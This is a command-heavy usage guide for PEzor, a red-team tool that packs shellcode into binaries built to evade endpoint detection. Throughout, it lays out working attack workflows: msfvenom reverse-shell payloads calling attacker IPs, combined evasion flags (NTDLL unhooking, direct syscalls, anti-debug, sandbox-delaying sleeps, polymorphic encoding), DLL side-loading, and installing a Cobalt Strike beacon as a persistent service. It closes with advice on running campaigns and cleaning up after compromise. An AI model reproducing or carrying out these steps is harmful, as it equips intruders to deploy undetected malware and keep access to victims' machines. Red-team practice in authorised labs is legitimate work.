PEzor
PEzor is an advanced red team tool that transforms raw shellcode and PE executables into EDR-evasive binaries using syscalls, memory injection, and NTDLL unhooking. It’s widely used for evading endpoint detection and response (EDR) solutions during post-exploitation.
Installation
Clone the repository and run the installation script:

```bash
git clone https://github.com/phra/PEzor.git
cd PEzor
./install.sh
```
For manual installation, ensure the dependencies are available:

```bash
# Ubuntu/Debian dependencies
sudo apt-get install mingw-w64 clang
# macOS with Homebrew
brew install mingw-w64
# Install additional required tools
pip install pefile
```
For Docker-based deployment:

```bash
docker build -t pezor .
docker run -it -v $(pwd):/work pezor /bin/bash
```
Key dependencies:
- mingw-w64: cross-compiler for Windows targets
- clang or wclang: C/C++ compiler support
- inline_syscall: direct syscall implementation
- nasm: assembler for assembly code
- donut: .NET assembly to shellcode converter
Quick Start
Basic workflow to pack shellcode into an executable:

```bash
# Generate shellcode (raw binary format)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw > shellcode.bin
# Pack with PEzor (minimal options)
./PEzor.sh shellcode.bin
# Output is generated as exe.bin or the specified format
```
Default behavior generates an executable that injects shellcode into itself upon execution.
Input Types
| Input Type | Format | Example | Use Case |
|---|---|---|---|
| Raw Shellcode | .bin binary | msfvenom output | Direct payload embedding |
| PE Executable | .exe / .dll | beacon.exe | Wrapping existing binaries |
| .NET Assembly | .exe / .dll | CSharp payload | Donut conversion + packing |
| Shellcode Stub | C array | unsigned char buf[] | Inline shellcode definitions |
Raw Shellcode Input
```bash
# msfvenom output (raw format)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=8080 \
  -f raw > payload.bin
# Cobalt Strike raw format
# Export beacon as raw shellcode from Cobalt Strike
./PEzor.sh beacon.bin
```
PE Executable Input
```bash
# Pack existing executable
./PEzor.sh process.exe -format=exe
# Pack DLL for injection
./PEzor.sh legit.dll -format=reflective-dll
```
.NET Assembly via Donut
```bash
# Convert .NET assembly to shellcode
donut -i program.exe -o donut_shellcode.bin
# Pack with PEzor
./PEzor.sh donut_shellcode.bin -format=exe
```
Output Formats
| Format | Extension | Description | Use Case |
|---|---|---|---|
| exe | .exe | Standalone Windows executable | Direct execution |
| dll | .dll | Dynamic Link Library | Process injection, DLL search order hijacking |
| reflective-dll | .dll | Position-independent DLL | In-memory reflective injection |
| service-exe | .exe | Windows Service executable | Persistence via service installation |
| service-dll | .dll | Service-compatible DLL | Service-based persistence |
Generate Executable
```bash
./PEzor.sh shellcode.bin -format=exe
# Output: exe.bin (rename to .exe)
mv exe.bin payload.exe
```
Generate DLL
```bash
./PEzor.sh shellcode.bin -format=dll
# Output: dll.bin (rename to .dll)
mv dll.bin payload.dll
```
Reflective DLL (Position-Independent)
```bash
./PEzor.sh shellcode.bin -format=reflective-dll
# Suitable for reflective DLL injection without relocation
```
Windows Service Executable
```bash
./PEzor.sh shellcode.bin -format=service-exe
# Executable compatible with service installation
sc create MalwareService binPath= "C:\path\to\service.exe"
```
Execution Methods
| Method | Flag | Description | Detection Risk |
|---|---|---|---|
| Self-Injection | -self | Thread creation within same process | Lower (no new process) |
| RX Memory | -rx | Read-execute memory allocation | Lower (not RWX) |
| Direct Syscalls | -syscalls | Bypass hooked NTDLL functions | Lowest |
| DLL Unhooking | -unhook | Remove NTDLL hooks before execution | Very Low |
Self-Injection
```bash
# Inject shellcode into the current process
./PEzor.sh shellcode.bin -self
```
RX Memory Execution
```bash
# Allocate RX (read-execute) memory instead of RWX
./PEzor.sh shellcode.bin -rx
```
Direct Syscalls
```bash
# Bypass hooked Windows API functions
./PEzor.sh shellcode.bin -syscalls
```
NTDLL Unhooking
```bash
# Remove installed hooks before execution (for EDR evasion)
./PEzor.sh shellcode.bin -unhook
```
Combined Approach
```bash
# Maximum evasion: syscalls + unhooking + RX memory
./PEzor.sh shellcode.bin -syscalls -unhook -rx -format=exe
```
Syscall Options
Direct syscalls allow bypassing user-mode API hooks planted by EDR solutions.

```bash
# Enable syscall-based API calls
./PEzor.sh shellcode.bin -syscalls
# Syscalls with Shikata Ga Nai encoding
./PEzor.sh shellcode.bin -syscalls -sgn
# Mixed API and syscall approach
./PEzor.sh shellcode.bin -syscalls -antidebug
```
Note: Syscall numbers must match the target OS version (Windows 10, Windows 11, Server variants).
Anti-Debug and Evasion
| Evasion Technique | Flag | Purpose |
|---|---|---|
| Anti-Debugging | -antidebug | Detect debugger attachment |
| Delayed Execution | -sleep=N | Sleep N seconds before execution |
| Text Section | -text | Execute from .text section instead of .reloc |
| Shikata Ga Nai | -sgn | Polymorphic XOR encoding |
| Obfuscation | -obfuscate | Add obfuscation layers |
Anti-Debug Detection
```bash
# Add anti-debugging checks
./PEzor.sh shellcode.bin -antidebug -format=exe
```
Delayed Execution
```bash
# Sleep 30 seconds before execution (evade quick sandboxes)
./PEzor.sh shellcode.bin -sleep=30 -format=exe
```
Text Section Execution
```bash
# Execute from .text section (less suspicious than .reloc)
./PEzor.sh shellcode.bin -text -format=exe
```
Polymorphic Encoding
```bash
# Apply Shikata Ga Nai encoding (avoid signature detection)
./PEzor.sh shellcode.bin -sgn -format=exe
```
Combined Evasion
```bash
# Full evasion suite
./PEzor.sh shellcode.bin -antidebug -sleep=15 -text -unhook -syscalls -format=exe
```
Unhooking
NTDLL unhooking removes user-mode hooks installed by EDR products, restoring direct access to Windows APIs.

```bash
# Unhook NTDLL before execution
./PEzor.sh shellcode.bin -unhook
# Unhook + syscalls (most effective)
./PEzor.sh shellcode.bin -unhook -syscalls
# Unhook with format specification
./PEzor.sh shellcode.bin -unhook -format=reflective-dll
```
How it works:
- Reads clean NTDLL from disk
- Replaces hooked functions in memory
- Restores original function prologues
- Redirects all subsequent API calls to clean versions
Shellcode Generation
MSFVenom Payloads

```bash
# Reverse TCP shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > meter.bin
# Reverse HTTPS
msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f raw > meter_https.bin
# Bind shell
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f raw > bind.bin
# Staged vs unstaged
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > staged.bin
msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > unstaged.bin
```
Cobalt Strike Raw Export
```bash
# In Cobalt Strike Beacon console:
# 1. Attacks > Packages > Shellcode Generator
# 2. Select "raw" output format
# 3. Copy to file and pack with PEzor
./PEzor.sh cobalt_beacon.bin -format=exe
```
Donut for .NET Assemblies
```bash
# Convert C# assembly to shellcode
donut -i CSharpPayload.exe -o csharp_shellcode.bin
# Pack converted shellcode
./PEzor.sh csharp_shellcode.bin -format=exe -unhook -syscalls
```
DLL Side-Loading Workflow
DLL side-loading abuses the DLL search order: a malicious DLL carrying the name of a DLL the application expects is placed where the loader finds it before the legitimate copy.

```bash
# Generate DLL payload
./PEzor.sh shellcode.bin -format=dll
# Rename to match the legitimate DLL name
cp dll.bin mscoree.dll
# Place alongside the legitimate application expecting that DLL
# The application loads the malicious DLL instead of the system version
```
Finding Side-Load Candidates
```bash
# Use Procmon to identify DLL loading attempts
# Look for "NAME NOT FOUND" errors indicating missing DLLs
# These are prime candidates for side-loading
# Common side-load targets:
# - mscoree.dll (CLR loader)
# - cryptbase.dll (crypto APIs)
# - dwmapi.dll (Desktop Window Manager)
# - wlanapi.dll (WiFi APIs)
```
Complete Examples
Meterpreter Reverse Shell

```bash
# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f raw > meterpreter.bin
# Pack with maximum evasion
./PEzor.sh meterpreter.bin -format=exe -antidebug -sleep=10 \
  -unhook -syscalls -text
# Output: exe.bin
cp exe.bin payloadmeter.exe
```
Cobalt Strike Beacon
```bash
# Export raw beacon from Cobalt Strike
# Place in: beacon.bin
# Pack with service format for persistence
./PEzor.sh beacon.bin -format=service-exe -unhook -syscalls -sgn
# Install as service
cp exe.bin C:\Windows\System32\svchost_malware.exe
sc create MalwareService binPath= "C:\Windows\System32\svchost_malware.exe"
sc start MalwareService
```
.NET C2 Agent via Donut
```bash
# Compile C# agent
csc.exe /out:Agent.exe Agent.cs
# Convert to shellcode
donut -i Agent.exe -o agent_shellcode.bin
# Pack as reflective DLL
./PEzor.sh agent_shellcode.bin -format=reflective-dll -unhook -syscalls
# Use with reflective DLL injection
```
Obfuscated DLL for DLL Search Order Hijacking
```bash
# Generate DLL
./PEzor.sh shellcode.bin -format=dll -sgn -antidebug -sleep=5
# Rename to match target
cp dll.bin version.dll
# Stage in directory with legitimate application
# Application execution triggers DLL load and payload execution
```
Troubleshooting
| Issue | Solution |
|---|---|
| command not found: PEzor.sh | Ensure the script is executable: chmod +x PEzor.sh |
| mingw-w64: not found | Install the cross-compiler: apt-get install mingw-w64 |
| Invalid shellcode format | Verify the input is raw binary (not hex/base64): file shellcode.bin |
| EDR still detecting | Add more evasion: -unhook -syscalls -text -antidebug |
| Shellcode corrupted on output | Use -rx with -format=exe for stability |
| DLL fails to load | Verify the correct format: -format=reflective-dll for injection scenarios |
| Service-exe won't start | Ensure the service has a compatible entry point (not a console application) |
Best Practices
- Test locally first: always validate payloads in a safe lab environment before deployment
- Layer evasion: combine -unhook, -syscalls, -antidebug, and -sleep for defense in depth
- Match OS version: syscall numbers vary by Windows version; validate the target OS before execution
- Use reflective DLL: for in-memory execution, prefer -format=reflective-dll over a standard DLL
- Encode payloads: apply -sgn (Shikata Ga Nai) encoding to avoid signature detection
- Randomize delays: use variable -sleep values across a campaign to avoid pattern detection
- Monitor modifications: EDR may detect file write behavior; stage payloads in memory when possible
- Test beacon connectivity: verify C2 communication before declaring success
- Cleanup indicators: remove PEzor output files and staging locations post-compromise
- Update regularly: PEzor evolves with EDR detection methods; monitor for updates
Related Tools
| Tool | Purpose | Integration |
|---|---|---|
| Donut | .NET to shellcode converter | Input generation for PEzor |
| ScareCrow | Shellcode loader with evasion | Alternative EDR bypass approach |
| Freeze | Process suspension for evasion | Complementary evasion technique |
| NimCrypt2 | Nim-based payload encryption | Payload encoding alternative |
| shhhloader | Silent loader framework | DLL loading wrapper |
| Cobalt Strike | Command & Control platform | Primary shellcode source |
| Metasploit | Payload generation | Alternative payload source |